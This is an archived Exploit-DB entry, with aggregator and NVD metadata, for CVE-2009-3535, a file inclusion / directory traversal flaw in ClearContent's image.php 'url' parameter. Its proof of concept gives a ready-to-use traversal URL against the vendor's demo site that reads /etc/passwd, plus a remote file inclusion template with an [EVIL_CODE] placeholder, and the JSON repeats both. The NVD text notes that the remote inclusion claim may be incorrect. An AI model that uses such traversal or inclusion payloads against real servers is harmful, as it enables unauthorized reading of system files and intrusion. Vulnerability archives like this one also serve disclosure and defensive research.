ID EDB-ID:9089
Type exploitdb
Reporter MizoZ
Modified 2009-07-09T00:00:00
Description
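ClearContent image.php `url` parameter RFI/LFI vulnerability (remote/local file inclusion). CVE-2009-3535. Web application exploit for the PHP platform. The NVD entry for this CVE describes it as a directory traversal in Clear Content 1.1 that allows reading arbitrary files, and notes that the remote file inclusion claim may be incorrect.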
----------------------------------------------------------------------------------------------------
Name : ClearContent
Site : http://www.allisclear.com/
Demo : http://demo.allisclear.com/
----------------------------------------------------------------------------------------------------
Found By : MizoZ [EvilWay Team]
Made in : Morocco
Contact : mizozx[at]gmail[dot]com
Greetz : Moudi , Zuka , All friends
----------------------------------------------------------------------------------------------------
P0c:
LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd
RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???
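RFI needs register_globals=on in the PHP configuration (off by default since PHP 4.2.0 and removed in PHP 5.4.0), so per this report the RFI variant depends on a non-default setting, while the LFI variant is not stated to need it.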
----------------------------------------------------------------------------------------------------
# milw0rm.com [2009-07-09]
{"id": "EDB-ID:9089", "hash": "181d6b2f25ad2626d09e135d98f144ea", "type": "exploitdb", "bulletinFamily": "exploit", "title": "ClearContent image.php url RFI/LFI Vulnerability", "description": "ClearContent (image.php url) RFI/LFI Vulnerability. CVE-2009-3535. Webapps exploit for php platform", "published": "2009-07-09T00:00:00", "modified": "2009-07-09T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/9089/", "reporter": "MizoZ", "references": [], "cvelist": ["CVE-2009-3535"], "lastseen": "2016-02-01T09:51:00", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-02-01T09:51:00"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3535"]}], "modified": "2016-02-01T09:51:00"}, "vulnersScore": 6.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/9089/", "sourceData": "----------------------------------------------------------------------------------------------------\n\n Name : ClearContent\n Site : http://www.allisclear.com/\n\n Demo : http://demo.allisclear.com/\n\n----------------------------------------------------------------------------------------------------\n\n \n Found By : MizoZ [EvilWay Team]\n\n Made in : Morocco\n Contact : mizozx[at]gmail[dot]com\n Greetz : Moudi , Zuka , All friends\n\n\n----------------------------------------------------------------------------------------------------\n\n\n P0c:\n \n LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd\n RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???\n\n\n RFI needs register_globals=on;\n\n----------------------------------------------------------------------------------------------------\n\n# milw0rm.com [2009-07-09]\n", "osvdbidlist": ["55742"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": 
["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:10:00", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in image.php in Clear Content 1.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the url parameter. NOTE: the researcher also suggests an analogous PHP remote file inclusion vulnerability, but this may be incorrect.", "modified": "2017-09-19T01:29:00", "id": "CVE-2009-3535", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3535", "published": "2009-10-02T19:30:00", "title": "CVE-2009-3535", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}